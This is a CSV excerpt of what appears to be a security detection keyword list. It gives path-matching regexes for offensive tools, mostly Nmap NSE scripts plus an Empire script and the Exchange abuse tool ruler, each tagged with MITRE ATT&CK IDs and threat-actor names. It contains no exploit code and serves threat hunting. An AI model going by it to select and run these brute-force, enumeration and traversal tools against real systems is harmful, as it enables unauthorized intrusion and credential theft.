"*/http-dlink-backdoor.nse*",".{0,1000}\/http\-dlink\-backdoor\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","7862"
"*/http-dombased-xss.nse*",".{0,1000}\/http\-dombased\-xss\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","7863"
"*/http-domino-enum-passwords.nse*",".{0,1000}\/http\-domino\-enum\-passwords\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","7864"
"*/http-drupal-enum.nse*",".{0,1000}\/http\-drupal\-enum\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","7865"
"*/http-drupal-enum-users.nse*",".{0,1000}\/http\-drupal\-enum\-users\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","7866"
"*/http-enum.nse*",".{0,1000}\/http\-enum\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","7867"
"*/http-errors.nse*",".{0,1000}\/http\-errors\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","7868"
"*/http-exif-spider.nse*",".{0,1000}\/http\-exif\-spider\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","7869"
"*/http-favicon.nse*",".{0,1000}\/http\-favicon\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","7870"
"*/http-feed.nse*",".{0,1000}\/http\-feed\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","7871"
"*/http-fetch.nse*",".{0,1000}\/http\-fetch\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","7872"
"*/http-fileupload-exploiter.nse*",".{0,1000}\/http\-fileupload\-exploiter\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","7873"
"*/http-form-brute.nse*",".{0,1000}\/http\-form\-brute\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","7874"
"*/http-form-fuzzer.nse*",".{0,1000}\/http\-form\-fuzzer\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","7875"
"*/http-frontpage-login.nse*",".{0,1000}\/http\-frontpage\-login\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","7876"
"*/http-generator.nse*",".{0,1000}\/http\-generator\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","7877"
"*/http-git.nse*",".{0,1000}\/http\-git\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","7878"
"*/http-gitweb-projects-enum.nse*",".{0,1000}\/http\-gitweb\-projects\-enum\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","7879"
"*/http-google-malware.nse*",".{0,1000}\/http\-google\-malware\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","7880"
"*/http-grep.nse*",".{0,1000}\/http\-grep\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","7881"
"*/http-headers.nse*",".{0,1000}\/http\-headers\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","7882"
"*/http-hp-ilo-info.nse*",".{0,1000}\/http\-hp\-ilo\-info\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","7883"
"*/http-huawei-hg5xx-vuln.nse*",".{0,1000}\/http\-huawei\-hg5xx\-vuln\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","7884"
"*/http-icloud-findmyiphone.nse*",".{0,1000}\/http\-icloud\-findmyiphone\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","7885"
"*/http-icloud-sendmsg.nse*",".{0,1000}\/http\-icloud\-sendmsg\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","7886"
"*/http-iis-short-name-brute.nse*",".{0,1000}\/http\-iis\-short\-name\-brute\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","7887"
"*/http-iis-webdav-vuln.nse*",".{0,1000}\/http\-iis\-webdav\-vuln\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","7888"
"*/http-internal-ip-disclosure.nse*",".{0,1000}\/http\-internal\-ip\-disclosure\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","7889"
"*/http-joomla-brute.nse*",".{0,1000}\/http\-joomla\-brute\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","7890"
"*/http-jsonp-detection.nse*",".{0,1000}\/http\-jsonp\-detection\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","7891"
"*/http-lexmark-version.nse*",".{0,1000}\/http\-lexmark\-version\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://github.com/nccgroup/nmap-nse-vulnerability-scripts","1","1","N/A","N/A","N/A","7","627","59","2022-03-04T09:08:55Z","2021-05-18T15:20:30Z","7892"
"*/http-lfi.nse*",".{0,1000}\/http\-lfi\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://github.com/cldrn/nmap-nse-scripts/tree/master/scripts","1","1","N/A","N/A","N/A","10","968","369","2022-01-22T18:40:30Z","2011-05-31T05:41:49Z","7893"
"*/http-litespeed-sourcecode-download.nse*",".{0,1000}\/http\-litespeed\-sourcecode\-download\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","7894"
"*/HTTP-Login.ps1*",".{0,1000}\/HTTP\-Login\.ps1.{0,1000}","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1109","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER","Framework","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","7895"
"*/http-ls.nse*",".{0,1000}\/http\-ls\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","7896"
"*/http-majordomo2-dir-traversal.nse*",".{0,1000}\/http\-majordomo2\-dir\-traversal\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","7897"
"*/http-malware-host.nse*",".{0,1000}\/http\-malware\-host\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","7898"
"*/http-mcmp.nse*",".{0,1000}\/http\-mcmp\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","7899"
"*/http-methods.nse*",".{0,1000}\/http\-methods\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","7900"
"*/http-method-tamper.nse*",".{0,1000}\/http\-method\-tamper\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","7901"
"*/http-mobileversion-checker.nse*",".{0,1000}\/http\-mobileversion\-checker\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","7902"
"*/http-nikto-scan.nse*",".{0,1000}\/http\-nikto\-scan\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://github.com/cldrn/nmap-nse-scripts/tree/master/scripts","1","1","N/A","N/A","N/A","10","968","369","2022-01-22T18:40:30Z","2011-05-31T05:41:49Z","7903"
"*/http-ntlm/ntlmtransport*",".{0,1000}\/http\-ntlm\/ntlmtransport.{0,1000}","offensive_tool_keyword","ruler","A tool to abuse Exchange services","T1087 - T1110 - T1133 - T1064 - T1204","TA0007 - TA0006 - TA0003 - TA0002 - TA0005","N/A","APT33","Persistence","https://github.com/sensepost/ruler","1","1","N/A","N/A","10","10","2222","362","2024-06-10T11:03:07Z","2016-08-18T15:05:13Z","7904"
"*/http-ntlm-info.nse*",".{0,1000}\/http\-ntlm\-info\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","7905"
"*/http-open-proxy.nse*",".{0,1000}\/http\-open\-proxy\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","7906"
"*/http-open-redirect.nse*",".{0,1000}\/http\-open\-redirect\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","7907"
